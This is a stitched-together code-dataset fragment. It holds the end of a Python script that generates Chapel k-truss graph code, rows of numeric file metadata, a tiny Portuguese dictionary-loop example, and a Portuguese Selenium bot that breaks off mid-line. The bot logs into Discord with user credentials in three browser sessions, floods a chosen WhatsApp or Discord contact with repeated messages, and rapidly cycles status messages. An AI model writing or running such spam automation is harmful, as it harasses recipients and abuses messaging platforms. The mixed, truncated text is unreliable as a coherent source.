toSymEntry(ag.getDST_R(), int).a,
PTriCount);
PTriCount=0;
repMsg=kTrussNaivePathMerge(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
PTriCount=0;
repMsg=kTrussNaiveMinSearch(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
/*
PTriCount=0;
repMsg=kTrussListIntersection(kValue,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a,
ag.neighbourR.a, ag.start_iR.a,ag.srcR.a,ag.dstR.a,PTriCount);
*/
var AtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
repMsg=kTruss(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
//var AtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
repMsg=kTrussMix(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
/*
repMsg=kTrussNaiveDirected(kValue,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a );
repMsg=kTrussDirected(kValue,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a );
*/
} else if (kValue==-2) {
//writeln("truss decomposition");
var PTriCount=makeDistArray(Ne,int);
/*
PTriCount=0;
repMsg=TrussDecompositionNaive(3,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a,
ag.neighbourR.a, ag.start_iR.a,ag.srcR.a,ag.dstR.a,PTriCount);
*/
PTriCount=0;
repMsg=TrussDecompositionNaivePathMerge(3,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, PTriCount);
var AtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
repMsg=TrussDecompositionTruss(3,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
/*
PTriCount=0;
repMsg=TrussNaiveDecompositionDirected(3,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a);
*/
//var AtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
repMsg=TrussDecompositionTrussMix(3,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
} else {//k max branch
//first the optimized method
maxtimer.clear();
var PTriCount=makeDistArray(Ne,atomic int);//keep the last no all removed results
var aPlTriCount=makeDistArray(Ne,atomic int);//for local use
forall i in 0..Ne-1 {
PTriCount[i].write(0);
aPlTriCount[i].write(0);
}
EdgeDeleted=-1;
lEdgeDeleted=-1;//for local use
maxtimer.start();
kLow=3;
// we first check kLow=3
repMsg=kTruss(kLow,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount);
forall i in 0..Ne-1 {// first keep last time's results
lEdgeDeleted[i]=EdgeDeleted[i];
PTriCount[i].write(aPlTriCount[i].read());
}
kUp=getupK(toSymEntry(ag.getNEIGHBOR(), int).a, toSymEntry(ag.getNEIGHBOR_R(), int).a);
outMsg="Estimated kUp="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if ((!AllRemoved) && (kUp>3)) {// we need to check if max k >3
var ConLoop=true:bool;
while ( (ConLoop) && (kLow<kUp)) {
// we will continuely check if the up value can remove all edges
forall i in 0..Ne-1 {// first keep last time's results
lEdgeDeleted[i]=EdgeDeleted[i];
aPlTriCount[i].write(PTriCount[i].read());
}
// we check the larget k vaule kUp which is the upper bound of max k
// we will use kMid to reduce kUp
AllRemoved=SkMaxTruss(kUp,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
if (!AllRemoved) { //the up value is the max k
ConLoop=false;
} else {// we will check the mid value to reduce kUp
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
aPlTriCount[i].write(PTriCount[i].read());
}
//"Try mid=",kMid);
AllRemoved=SkMaxTruss(kMid,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
if (AllRemoved) { // if mid value can remove all edges, we will reduce the up value for checking
kUp=kMid-1;
} else { // we will improve both low and mid value
if kMid>=kUp-1 {
ConLoop=false;
kUp=kMid;
} else {// we will update the low value and then check the mid value
// until all edges are removed
while ((AllRemoved==false) && (kMid<kUp-1)) {
kLow=kMid;
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
EdgeDeleted[i]=lEdgeDeleted[i];
PTriCount[i].write(aPlTriCount[i].read());
}
//("Try mid again=",kMid);
AllRemoved=SkMaxTruss(kMid,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
}
if (!AllRemoved) {
kUp=kMid;
ConLoop=false;
} else {
kUp=kMid-1;
}
}
}
}
}// end of while
var countName = st.nextName();
var countEntry = new shared SymEntry(lEdgeDeleted);
st.addEntry(countName, countEntry);
repMsg = 'created ' + st.attrib(countName);
maxtimer.stop();
outMsg="After Max KTruss, Total execution time ="+(maxtimer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Max KTruss, Max k="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {//kUp<=3 or AllRemoved==true
maxtimer.stop();
outMsg="After Max KTruss,Total execution time ="+(maxtimer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if (AllRemoved==false) {
outMsg="After Max KTruss, Max k=3";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {
outMsg="After Max KTruss,Max k=2";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
}
}
//second the Mix method.
var AtoTriCount=makeDistArray(Ne,atomic int);
var lAtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
forall i in lAtoTriCount {
i.write(0);
}
maxtimer.stop();
maxtimer.clear();
EdgeDeleted=-1;
lEdgeDeleted=-1;
maxtimer.start();
kLow=3;
// we first initialize the kmax from kLow=3
repMsg=kTrussMix(kLow,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, lAtoTriCount);
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
AtoTriCount[i].write(lAtoTriCount[i].read());
}
kUp=getupK(toSymEntry(ag.getNEIGHBOR(), int).a, toSymEntry(ag.getNEIGHBOR_R(), int).a);
outMsg="Estimated kUp="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if ((AllRemoved==false) && (kUp>3)) {// k max >3
var ConLoop=true:bool;
while ( (ConLoop) && (kLow<kUp)) {
// we will continuely check if the up value can remove the all edges
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
lAtoTriCount[i].write(AtoTriCount[i].read());
}
AllRemoved=SkMaxTrussMix(kUp,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, lAtoTriCount,lEdgeDeleted);
//writeln("Try up=",kUp);
if (AllRemoved==false) { //the up value is the max k
ConLoop=false;
} else {// we will check the mid value to reduce k max
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
lAtoTriCount[i].write(AtoTriCount[i].read());
}
//writeln("Try mid=",kMid);
AllRemoved=SkMaxTrussMix(kMid,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, lAtoTriCount,lEdgeDeleted);
if (AllRemoved==true) { // if mid value can remove all edges, we will reduce the up value for checking
kUp=kMid-1;
} else { // we will improve both low and mid value
if kMid==kUp-1 {
ConLoop=false;
kUp=kMid;
} else {// we will update the low value and then check the mid value
while ((AllRemoved==false) && (kMid<kUp-1)) {
kLow=kMid;
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
EdgeDeleted[i]=lEdgeDeleted[i];
AtoTriCount[i].write(lAtoTriCount[i].read());
}
//writeln("Try mid again=",kMid);
AllRemoved=SkMaxTrussMix(kMid,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, lAtoTriCount,lEdgeDeleted);
}
if (AllRemoved==false) {
kUp=kMid;
ConLoop=false;
} else {
kUp=kMid-1;
}
}
}
}
}// end of while
var countName = st.nextName();
var countEntry = new shared SymEntry(lEdgeDeleted);
st.addEntry(countName, countEntry);
repMsg = 'created ' + st.attrib(countName);
maxtimer.stop();
outMsg="After Max KTruss Mix ,Total execution time ="+(maxtimer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Max KTruss Mix ,Max k="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {//kUp<=3 or AllRemoved==true
maxtimer.stop();
outMsg="After Max KTruss Mix ,Total execution time ="+(maxtimer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if (AllRemoved==false) {
outMsg="After Max KTruss Mix ,Max k=3";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {
outMsg="After Max KTruss Mix ,Max k=2";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
}
}
}//
} else {// we have not tested directed graph extensively.
if (kValue>0) {// k branch
writeln("Enter kTruss k=",kValue);
repMsg=kTrussDirected(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a);
} else if (kValue==-2) {
//writeln("Enter Truss Directed Naive Decomposition");
//repMsg=TrussNaiveDecompositionDirected(3,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a);
//writeln("Enter Truss Directed Decomposition ");
//repMsg=TrussDecompositionDirected(3,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a);
} else {//k max branch
}//
return new MsgTuple(repMsg, MsgType.NORMAL);
}
proc registerMe() {
use CommandMap;
registerFunction("segmentedTruss", segTrussMsg);
}
}
'''
UnDirectedGraphTestBegin='''
if (!Directed) {//for undirected graph
'''
UnDirectedGraphTestEnd='''
} //end of undirected graph
'''
EndCode='''
return new MsgTuple(repMsg, MsgType.NORMAL);
}
proc registerMe() {
use CommandMap;
registerFunction("segmentedTruss", segTrussMsg);
}
}
'''
print(BeginCode)
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("//Begin of K-Truss Functions")
GenTrussFun("kTrussNaiveListIntersection",Parameters,NaiveListIntersection)
GenTrussFun("kTrussNaiveSetSearchSmall",Parameters,NaiveSetSearchSmall)
GenTrussFun("kTrussNaiveSetSearchSmallSeq",Parameters,NaiveSetSearchSmallSeq)
GenTrussFun("kTrussNaivePathMerge",Parameters,NaivePathMerge)
GenTrussFun("kTrussNaiveMinSearch",Parameters,NaiveMinSearch)
GenTrussFun("kTruss",ParametersAtomic,TrussAtomic)
GenTrussFun("kTrussMix",ParametersAtomic,TrussMixAtomic)
print("//End of K-Truss Functions")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("")
print("")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("//Begin of Max K-Truss Functions")
GenMaxTrussFunAtomic("OnceMaxTruss",MaxParametersAtomic,MaxTrussAtomic)
GenMaxTrussFunAtomic("OnceMaxTrussMix",MaxParametersAtomic,MaxTrussMixAtomic)
print("//End of Max K-Truss Functions")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("")
print("")
#print(middle)
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("//Begin of Truss Decomposition Functions")
GenDecompositionFun("TrussDecompositionNaiveListIntersection",Parameters,NaiveListIntersection)
GenDecompositionFun("TrussDecompositionNaiveSetSearchSmall",Parameters,NaiveSetSearchSmall)
GenDecompositionFun("TrussDecompositionNaivePathMerge",Parameters,NaivePathMerge)
GenDecompositionFun("TrussDecompositionNaiveMinSearch",Parameters,NaiveMinSearch)
GenDecompositionFun("TrussDecomposition",ParametersAtomic,TrussAtomic)
GenDecompositionFun("TrussMixDecomposition",ParametersAtomic,TrussMixAtomic)
print("//End of Truss Decomposition Functions")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("")
print("")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("//Begin of Undirected Graph ")
print(UnDirectedGraphTestBegin)
GenTrussTest()
GenMaxTrussTest()
GenDecompositionTest()
print(UnDirectedGraphTestEnd)
print("//End of Undirected Graph Test")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("")
print("")
print(EndCode)
| 47.517374
| 138
| 0.309881
| 38,820
| 493,658
| 3.928594
| 0.015945
| 0.013803
| 0.016963
| 0.026097
| 0.931735
| 0.926719
| 0.923538
| 0.920686
| 0.918555
| 0.913277
| 0
| 0.023475
| 0.593919
| 493,658
| 10,388
| 139
| 47.521948
| 0.737296
| 0.001533
| 0
| 0.582763
| 0
| 0.02169
| 0.93231
| 0.113564
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008562
| false
| 0
| 0
| 0
| 0.019977
| 0.061644
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
29dccd2522bcc040ecaf22404e79a2768d926264
| 312
|
py
|
Python
|
16.loop3/13.percorrendo_valores_do_dic_com_for.py
|
robinson-1985/python-zero-dnc
|
df510d67e453611fcd320df1397cdb9ca47fecb8
|
[
"MIT"
] | null | null | null |
16.loop3/13.percorrendo_valores_do_dic_com_for.py
|
robinson-1985/python-zero-dnc
|
df510d67e453611fcd320df1397cdb9ca47fecb8
|
[
"MIT"
] | null | null | null |
16.loop3/13.percorrendo_valores_do_dic_com_for.py
|
robinson-1985/python-zero-dnc
|
df510d67e453611fcd320df1397cdb9ca47fecb8
|
[
"MIT"
] | null | null | null |
#percorrendo valores do dicionário com for
dicionario_full = {'usuario':'Peter','lingua':'pt-br','pet':['cachorro_1','cachorro_2']}
for a in dicionario_full.values():
print(a)
dicionario_full = {'usuario':'Peter','lingua':'pt-br','pet':['cachorro_1','cachorro_2']}
for a in dicionario_full.keys():
print(a)
| 34.666667
| 88
| 0.705128
| 46
| 312
| 4.608696
| 0.478261
| 0.264151
| 0.198113
| 0.245283
| 0.726415
| 0.726415
| 0.726415
| 0.726415
| 0.726415
| 0.726415
| 0
| 0.014035
| 0.086538
| 312
| 9
| 89
| 34.666667
| 0.729825
| 0.13141
| 0
| 0.666667
| 0
| 0
| 0.339483
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
29e1d312aea23cfb51dce4af5aa3a3f256f538a8
| 13,218
|
py
|
Python
|
main.py
|
TalionDev/webdriverbots
|
6ff6515c39791d16c91f308744b710632eb94e08
|
[
"MIT"
] | 2
|
2020-06-08T00:58:51.000Z
|
2020-06-08T02:04:46.000Z
|
main.py
|
TalionDev/webdriverbots
|
6ff6515c39791d16c91f308744b710632eb94e08
|
[
"MIT"
] | null | null | null |
main.py
|
TalionDev/webdriverbots
|
6ff6515c39791d16c91f308744b710632eb94e08
|
[
"MIT"
] | null | null | null |
#importando as parada
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import ElementNotInteractableException
import asyncio
print("os brabo")
print("bot supremo do zap pressione 1")
print("bot supremo discord pressione 2")
option = input("qual vai ser? ")
option = int(option)
if (option == 1):
print("bot supremo do zap")
print("para ficar mudando o seu recado pressione 1")
print("para ficar floodando qualquer mensagem pressione 2")
option = input("qual vai ser? ")
option = int(option)
if (option == 1):
print("tu escolheu mudar o recado")
time.sleep(1)
driver = webdriver.Chrome()
# abrindo o zap // nessa hora tu pega a camera de QR code do wpp web e abre o seu zap
driver.get("https://web.whatsapp.com/")
# cooldown brabo
time.sleep(4)
msg1 = input("recado q tu quer meter: ")
msg2 = input("recado q tu quer meter: ")
msg3 = input("recado q tu quer meter: ")
num = input("quantas vezes: ")
num = int(num) # transformando a variavel num em inteiro pq o python eh pau no cu e n faz automaticamente
a = []
# localizando o path no html e clicando nele
driver.find_element_by_class_name("_1BjNO").click()
time.sleep(1)
def cuzin():
a = driver.find_elements_by_xpath("//span[@data-icon='pencil']")
a[1].click()
driver.find_element_by_xpath("//div[@contenteditable='true']").send_keys(
Keys.BACKSPACE * 10 + msg1 + Keys.ENTER)
time.sleep(4)
a = driver.find_elements_by_xpath("//span[@data-icon='pencil']")
a[1].click()
driver.find_element_by_xpath("//div[@contenteditable='true']").send_keys(
Keys.BACKSPACE * 10 + msg2 + Keys.ENTER)
time.sleep(4)
a = driver.find_elements_by_xpath("//span[@data-icon='pencil']")
a[1].click()
driver.find_element_by_xpath("//div[@contenteditable='true']").send_keys(
Keys.BACKSPACE * 10 + msg3 + Keys.ENTER)
time.sleep(4)
i = 0
while (i <= num):
cuzin()
i = i + 1
elif (option == 2):
print("tu escolheu floodar qualquer coisa")
time.sleep(1)
# falando pro selenium que eu quero uma variavel setada como webdriver usando o driver do chrome
driver = webdriver.Chrome()
# abrindo o zap // nessa hora tu pega a camera de QR code do wpp web e abre o seu zap
driver.get("https://web.whatsapp.com/")
# cooldown brabo
time.sleep(4)
# variaveis neh rapazeada
i = 0 # variavel de controle padrao pro while, sim eu odeio for
name = input('nome do contato q tu quer spammar: ')
msg = input("msg q tu quer spammar: ")
num = input("quantas vezes: ")
num = int(num) # transformando a variavel num em inteiro pq o python eh pau no cu e n faz automaticamente
# localizando o path no html e clicando nele
driver.find_element_by_xpath("//span[@title='" + name + "']").click()
# criando uma funçao q localiza os path no html, enviando string e depois dando enter
def cuzin():
a = driver.find_elements_by_xpath("//div[@class='_3FRCZ copyable-text selectable-text']")
a[1].send_keys(" " + msg + Keys.ENTER)
# executando a funçao ate bater o num q foi setado
while (i <= num):
cuzin()
i = i + 1
elif (option == 2):
print("bot supremo do discord")
print("para ficar mudando o status rapidamente (baladinha) pressione 1")
print("para ficar mudando o seu recado pressione 2")
print("para ficar floodando qualquer mensagem pressione 3")
option = input("qual vai ser? ")
option = int(option)
if (option == 1):
print("tu escolheu baladinha")
time.sleep(1)
driver = webdriver.Chrome()
driver.get("https://discord.com/channels/@me")
email = input("email da conta: ")
senha = input("senha da conta: ")
num = input("quantas vezes: ")
num = int(num)
cd = input(
"cooldown entre as mudanças em segundos (números mto baixos podem não funcionar) // recomendado 1 segundo: ")
cd = int(cd)
# login
driver.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6)
def cuzin():
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(cd)
driver.find_element_by_xpath("//div[@id='status-picker-online']").click()
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(cd)
driver.find_element_by_xpath("//div[@id='status-picker-idle']").click()
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(cd)
driver.find_element_by_xpath("//div[@id='status-picker-dnd']").click()
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(cd)
driver.find_element_by_xpath("//div[@id='status-picker-invisible']").click()
i = 0
while (i <= num):
cuzin()
i = i + 1
elif (option == 2):
print("tu escolheu mudar os recados psicodelicamente")
driver = webdriver.Chrome()
driver.get("https://discord.com/channels/@me")
email = input("email da conta: ")
senha = input("senha da conta: ")
num = input("quantas vezes: ")
num = int(num)
msg1 = input("recado 1: ")
msg2 = input("recado 2: ")
msg3 = input("recado 3: ")
cd = input(
"cooldown entre as mudanças em segundos (números mto baixos podem não funcionar) // recomendado 2 segundos: ")
cd = int(cd)
# login
driver.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6)
def cuzin():
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(0.5)
driver.find_element_by_xpath("//div[@aria-label='Editar status personalizado']").click()
time.sleep(0.3)
driver.find_element_by_xpath("//input[@placeholder='O suporte chegou!']").send_keys(
Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + msg1 + Keys.ENTER)
time.sleep(cd)
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(0.5)
driver.find_element_by_xpath("//div[@aria-label='Editar status personalizado']").click()
time.sleep(0.3)
driver.find_element_by_xpath("//input[@placeholder='O suporte chegou!']").send_keys(
Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + msg2 + Keys.ENTER)
time.sleep(cd)
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(0.5)
driver.find_element_by_xpath("//div[@aria-label='Editar status personalizado']").click()
time.sleep(0.3)
driver.find_element_by_xpath("//input[@placeholder='O suporte chegou!']").send_keys(
Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + msg3 + Keys.ENTER)
time.sleep(cd)
i = 0
while (i <= num):
cuzin()
i = i + 1
elif (option == 3):
# falando pro selenium que eu quero uma variavel setada como webdriver usando o driver do chrome
driver = webdriver.Chrome()
driver2 = webdriver.Chrome()
driver3 = webdriver.Chrome()
# abrindo o zap // nessa hora tu pega a camera de QR code do wpp web e abre o seu zap
driver.get("https://discord.com/channels/@me")
driver2.get("https://discord.com/channels/@me")
driver3.get("https://discord.com/channels/@me")
email = input("email da conta: ")
senha = input("senha da conta: ")
name = input('nome de quem tu quer spammar (chat, server, dm, sla): ')
msg = input('a msg que tu quer spammar (pode ser link de img/gif): ')
num = input("quantas vezes: ")
num = int(num) # transformando a variavel num em inteiro pq o python eh pau no cu e n faz automaticamente
cd = input(
"cooldown entre as msg em segundos (números mto baixos podem não funcionar) // recomendado 1 segundo: ")
cd = int(cd)
# login
driver.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6)
driver2.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver2.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver2.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6)
driver3.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver3.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver3.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6) # cooldown do login
# procurando o cara e dando enter
driver.find_element_by_xpath("//button[@class='searchBarComponent-32dTOx']").click()
driver.find_element_by_xpath("//input[@placeholder='Aonde você gostaria de ir?']").send_keys(name + Keys.ENTER)
# procurando o cara e dando enter
driver2.find_element_by_xpath("//button[@class='searchBarComponent-32dTOx']").click()
driver2.find_element_by_xpath("//input[@placeholder='Aonde você gostaria de ir?']").send_keys(name + Keys.ENTER)
driver3.find_element_by_xpath("//button[@class='searchBarComponent-32dTOx']").click()
driver3.find_element_by_xpath("//input[@placeholder='Aonde você gostaria de ir?']").send_keys(name + Keys.ENTER)
# Locate the message box in each session, send the message and press Enter.
async def cuzin():
    """Send one round of spam messages on driver, driver2 and driver3.

    Reads module-level state: the three WebDriver sessions, ``msg`` (text to
    send) and ``cd`` (cooldown in seconds).  If the text area is not
    interactable (e.g. a confirmation dialog covers it), the primary dialog
    button is pressed instead and a double cooldown is applied.

    NOTE(review): ``time.sleep`` blocks the event loop inside an ``async``
    function; harmless here because nothing runs concurrently, but
    ``asyncio.sleep`` would be the idiomatic choice if that ever changes.
    """
    # XPaths hoisted once; the three drivers previously had three verbatim
    # copies of each statement — a single loop preserves the same sequential
    # order of operations.
    message_box = ("//div[@class='markup-2BOw-j slateTextArea-1Mkdgw "
                   "fontSize16Padding-3Wk7zP']")
    primary_button = ("//button[@class='primaryButton-3oJYZH button-38aScr "
